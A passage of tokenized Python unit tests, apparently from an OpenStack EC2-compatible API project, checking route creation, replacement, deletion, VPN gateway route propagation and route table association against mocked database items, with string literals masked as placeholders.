<EOL> fakes . random_ec2_id ( '<STR_LIT>' ) , fakes . random_os_id ( ) , <EOL> fakes . ID_EC2_VPC_1 , fakes . random_ec2_id ( '<STR_LIT>' ) , '<STR_LIT>' , <EOL> instance_id = fakes . ID_EC2_INSTANCE_1 ) <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . DB_VPC_1 , eni_vpc_2 , fakes . DB_IGW_1 , fakes . DB_IGW_2 , <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 , <EOL> fakes . DB_VPN_GATEWAY_2 ) <EOL> def do_check ( params , error_code ) : <EOL> self . assert_execution_error ( error_code , '<STR_LIT>' , params ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . CIDR_VPC_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . 
ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . CIDR_VPC_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . IP_NETWORK_INTERFACE_1 + '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_2 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : id_ec2_eni_vpc_2 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_2 } , <EOL> '<STR_LIT>' ) <EOL> self . add_mock_db_items ( eni_2_in_instance_1 ) <EOL> do_check ( { '<STR_LIT>' : fakes . 
ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_2 } , <EOL> '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create_or_replace_route_rollback ( self , routes_updater ) : <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . DB_VPC_1 , fakes . DB_IGW_1 , <EOL> fakes . gen_db_igw ( fakes . ID_EC2_IGW_2 , fakes . ID_EC2_VPC_1 ) ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> with tools . ScreeningLogger ( log_name = '<STR_LIT>' ) : <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } ) <EOL> self . db_api . update_item . assert_called_with ( mock . ANY , <EOL> fakes . DB_ROUTE_TABLE_1 ) <EOL> with tools . ScreeningLogger ( log_name = '<STR_LIT>' ) : <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_2 } ) <EOL> self . db_api . update_item . assert_called_with ( mock . ANY , <EOL> fakes . DB_ROUTE_TABLE_2 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_replace_route ( self , routes_updater ) : <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : fakes . ID_EC2_IGW_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . set_mock_db_items ( <EOL> route_table , fakes . DB_VPC_1 , fakes . DB_IGW_1 , <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . 
ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> fakes . ID_EC2_NETWORK_INTERFACE_1 } ) <EOL> self . assertEqual ( True , resp [ '<STR_LIT>' ] ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . db_api . update_item . assert_called_once_with ( mock . ANY , route_table ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , route_table , <EOL> update_target = route_table_api . HOST_TARGET ) <EOL> def test_replace_route_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , <EOL> fakes . DB_VPC_1 , fakes . DB_IGW_1 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_delete_route ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : <EOL> fakes . CIDR_EXTERNAL_NETWORK } ) <EOL> self . assertEqual ( True , resp [ '<STR_LIT>' ] ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_2 ) <EOL> route_table [ '<STR_LIT>' ] = [ <EOL> r for r in route_table [ '<STR_LIT>' ] <EOL> if r [ '<STR_LIT>' ] != fakes . CIDR_EXTERNAL_NETWORK ] <EOL> self . db_api . update_item . assert_called_once_with ( mock . ANY , route_table ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , route_table , <EOL> update_target = route_table_api . HOST_TARGET ) <EOL> def test_delete_route_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . 
ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . CIDR_VPC_1 } ) <EOL> @ tools . screen_unexpected_exception_logs <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_delete_route_rollback ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . CIDR_EXTERNAL_NETWORK } ) <EOL> self . db_api . update_item . assert_any_call ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_2 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_enable_vgw_route_propagation ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_VPN_GATEWAY_1 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> route_table_1_updated = tools . update_dict ( <EOL> fakes . DB_ROUTE_TABLE_1 , <EOL> { '<STR_LIT>' : [ fakes . ID_EC2_VPN_GATEWAY_1 ] } ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , route_table_1_updated ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , route_table_1_updated , <EOL> update_target = route_table_api . VPN_TARGET ) <EOL> self . db_api . reset_mock ( ) <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_2 , <EOL> tools . update_dict ( fakes . 
DB_VPN_GATEWAY_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_1 } ) ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> db_route_table_2 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_2 ) <EOL> db_route_table_2 [ '<STR_LIT>' ] . append ( <EOL> fakes . ID_EC2_VPN_GATEWAY_2 ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , db_route_table_2 ) <EOL> def test_enable_vgw_route_propagation_idempotent ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . DB_VPN_GATEWAY_1 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> self . assertFalse ( self . db_api . update_item . called ) <EOL> def test_enable_vgw_route_propagation_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_VPN_GATEWAY_1 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_VPN_GATEWAY_2 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_1 , <EOL> tools . update_dict ( fakes . DB_VPN_GATEWAY_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_2 } ) ) <EOL> self . 
assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> @ tools . screen_unexpected_exception_logs <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_enable_vgw_route_propagation_rollback ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_VPN_GATEWAY_1 ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . db_api . update_item . assert_called_with ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_1 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_disable_vgw_route_propagation ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . DB_VPN_GATEWAY_1 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> route_table_1_updated = tools . purge_dict ( <EOL> fakes . DB_ROUTE_TABLE_2 , ( '<STR_LIT>' , ) ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , route_table_1_updated ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , route_table_1_updated , <EOL> update_target = route_table_api . VPN_TARGET ) <EOL> self . db_api . reset_mock ( ) <EOL> routes_updater . reset_mock ( ) <EOL> db_route_table_2 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_2 ) <EOL> db_route_table_2 [ '<STR_LIT>' ] . append ( <EOL> fakes . ID_EC2_VPN_GATEWAY_2 ) <EOL> self . set_mock_db_items ( db_route_table_2 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> self . 
assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_2 ) <EOL> self . assertFalse ( routes_updater . called ) <EOL> def test_disable_vgw_route_propagation_idempotent ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> self . assertFalse ( self . db_api . update_item . called ) <EOL> def test_disable_vgw_route_propagation_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> @ tools . screen_unexpected_exception_logs <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_disable_vgw_route_propagation_rollbadk ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . DB_VPN_GATEWAY_1 ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . db_api . update_item . assert_called_with ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_2 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_associate_route_table ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_VPC_1 , fakes . DB_ROUTE_TABLE_1 , <EOL> fakes . DB_SUBNET_1 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_1 } ) <EOL> self . assertEqual ( fakes . ID_EC2_SUBNET_1 . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> resp [ '<STR_LIT>' ] ) <EOL> subnet_1 = tools . 
update_dict ( <EOL> fakes . DB_SUBNET_1 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , subnet_1 ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , subnet_1 , fakes . DB_ROUTE_TABLE_1 ) <EOL> def test_associate_route_table_invalid_parameters ( self ) : <EOL> def do_check ( params , error_code ) : <EOL> self . assert_execution_error ( <EOL> error_code , '<STR_LIT>' , params ) <EOL> self . set_mock_db_items ( ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_1 } , <EOL> '<STR_LIT>' ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_1 } , <EOL> '<STR_LIT>' ) <EOL> id_ec2_subnet_vpc_2 = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> db_subnet_vpc_2 = { '<STR_LIT:id>' : id_ec2_subnet_vpc_2 , <EOL> '<STR_LIT>' : fakes . random_os_id ( ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_2 } <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , db_subnet_vpc_2 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : id_ec2_subnet_vpc_2 } , <EOL> '<STR_LIT>' ) <EOL> subnet_2 = tools . update_dict ( <EOL> fakes . DB_SUBNET_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , subnet_2 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_2 } , <EOL> '<STR_LIT>' ) <EOL> @ tools . screen_unexpected_exception_logs <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_associate_route_table_rollback ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_VPC_1 , fakes . DB_ROUTE_TABLE_1 , <EOL> fakes . DB_SUBNET_1 ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> self . assert_execution_error ( <EOL> self . 
ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_1 } ) <EOL> self . db_api . update_item . assert_any_call ( mock . ANY , fakes . DB_SUBNET_1 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_replace_route_table_association ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . DB_ROUTE_TABLE_3 , <EOL> fakes . DB_SUBNET_2 ) <EOL> resp = self . execute ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . assertEqual ( fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_2 , <EOL> resp [ '<STR_LIT>' ] ) <EOL> subnet_2 = tools . update_dict ( <EOL> fakes . DB_SUBNET_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , subnet_2 ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , subnet_2 , fakes . DB_ROUTE_TABLE_2 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_replace_route_table_association_main ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . DB_VPC_1 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . assertEqual ( fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 , <EOL> resp [ '<STR_LIT>' ] ) <EOL> vpc = tools . update_dict ( <EOL> fakes . DB_VPC_1 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , vpc ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , fakes . 
DB_ROUTE_TABLE_2 , <EOL> default_associations_only = True ) <EOL> def test_replace_route_table_association_invalid_parameters ( self ) : <EOL> def do_check ( params , error_code ) : <EOL> self . assert_execution_error ( <EOL> error_code , '<STR_LIT>' , params ) <EOL> self . set_mock_db_items ( ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } , <EOL> '<STR_LIT>' ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } , <EOL> '<STR_LIT>' ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_3 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_3 } , <EOL> '<STR_LIT>' ) <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_3 , <EOL> tools . purge_dict ( fakes . DB_SUBNET_2 , [ '<STR_LIT>' ] ) ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_3 } , <EOL> '<STR_LIT>' ) <EOL> id_ec2_subnet_vpc_2 = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> db_subnet_vpc_2 = { '<STR_LIT:id>' : id_ec2_subnet_vpc_2 , <EOL> '<STR_LIT>' : fakes . random_os_id ( ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_2 , <EOL> '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) } <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , db_subnet_vpc_2 ) <EOL> do_check ( { '<STR_LIT>' : ec2utils . change_ec2_id_kind ( <EOL> id_ec2_subnet_vpc_2 , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } , <EOL> '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_replace_route_table_association_rollback ( self , routes_updater , <EOL> multiply_routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . 
DB_ROUTE_TABLE_3 , fakes . DB_SUBNET_2 , <EOL> fakes . DB_VPC_1 ) <EOL> multiply_routes_updater . side_effect = Exception ( ) <EOL> with tools . ScreeningLogger ( log_name = '<STR_LIT>' ) : <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . db_api . update_item . assert_any_call ( <EOL> mock . ANY , fakes . DB_VPC_1 ) <EOL> self . db_api . reset_mock ( ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> with tools . ScreeningLogger ( log_name = '<STR_LIT>' ) : <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . db_api . update_item . assert_any_call ( <EOL> mock . ANY , fakes . DB_SUBNET_2 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_disassociate_route_table ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_3 , <EOL> fakes . DB_SUBNET_2 , fakes . DB_VPC_1 ) <EOL> resp = self . execute ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 } ) <EOL> self . assertEqual ( True , resp [ '<STR_LIT>' ] ) <EOL> subnet_1 = tools . purge_dict ( fakes . DB_SUBNET_2 , ( '<STR_LIT>' , ) ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , subnet_1 ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , subnet_1 , fakes . DB_ROUTE_TABLE_1 ) <EOL> def test_disassociate_route_table_invalid_parameter ( self ) : <EOL> def do_check ( params , error_code ) : <EOL> self . assert_execution_error ( <EOL> error_code , '<STR_LIT>' , params ) <EOL> self . set_mock_db_items ( ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 } , <EOL> '<STR_LIT>' ) <EOL> self . 
